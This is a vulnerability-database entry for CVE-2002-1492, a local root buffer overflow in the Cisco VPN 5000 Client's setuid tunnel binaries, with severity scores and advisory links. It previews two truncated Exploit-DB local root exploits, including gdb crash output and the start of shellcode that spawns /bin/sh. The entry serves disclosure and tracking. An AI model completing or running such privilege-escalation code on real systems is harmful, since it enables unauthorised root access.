CVE-2002-1492
published 2003-04-02CVE-2002-1492: Buffer overflows in the Cisco VPN 5000 Client before 5.2.7 for Linux, and VPN 5000 Client before 5.2.8 for Solaris, allow local users to gain root privileges…
PriorityP427high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.72%
74.6th percentile
Buffer overflows in the Cisco VPN 5000 Client before 5.2.7 for Linux, and VPN 5000 Client before 5.2.8 for Solaris, allow local users to gain root privileges via (1) close_tunnel and (2) open_tunnel.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | vpn_5000_client | — | — |
| cisco | vpn_5000_client | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cisco VPN 5000 Client - Buffer Overrun (1)
exploitdb·2002-09-18
CVE-2002-1492 Cisco VPN 5000 Client - Buffer Overrun (1)
Cisco VPN 5000 Client - Buffer Overrun (1)
---
// source: https://www.securityfocus.com/bid/5734/info
Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.
/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax 0xffffffff -1
* ecx 0x0 0
* edx 0x0 0
* ebx 0x4015c154 1075167572
* esp 0xbfffdb70 0xbfffdb70
* ebp 0x41414141 0x41414141
* esi 0x400168e4 1073834212
* edi 0xbfffdb
Exploit-DB
Cisco VPN 5000 Client - Buffer Overrun (2)
exploitdb·2002-09-18
CVE-2002-1492 Cisco VPN 5000 Client - Buffer Overrun (2)
Cisco VPN 5000 Client - Buffer Overrun (2)
---
// source: https://www.securityfocus.com/bid/5734/info
Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.
/*
* Cisco VPN 5000 Linux client version 5.1.5 local root exploit
*
* By zillion[at]safemode.org 09/2002
*
* Greets to the 0dd people ;p
*
*/
#include
#include
#include
#define BUFFER_SIZE 2504
#define NOP 0x90
#define RET 0xbffff0e0
char shellcode[]=
/* setresuid(0,0,0) && execve("/bin/sh",["/bin/sh"],0); */
"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\
No writeups or analysis indexed.
http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtmlhttp://www.iss.net/security_center/static/10131.phphttp://www.securityfocus.com/bid/5734http://www.cisco.com/warp/public/707/vpn5k-client-multiple-vuln-pub.shtmlhttp://www.iss.net/security_center/static/10131.phphttp://www.securityfocus.com/bid/5734
2003-04-02
Published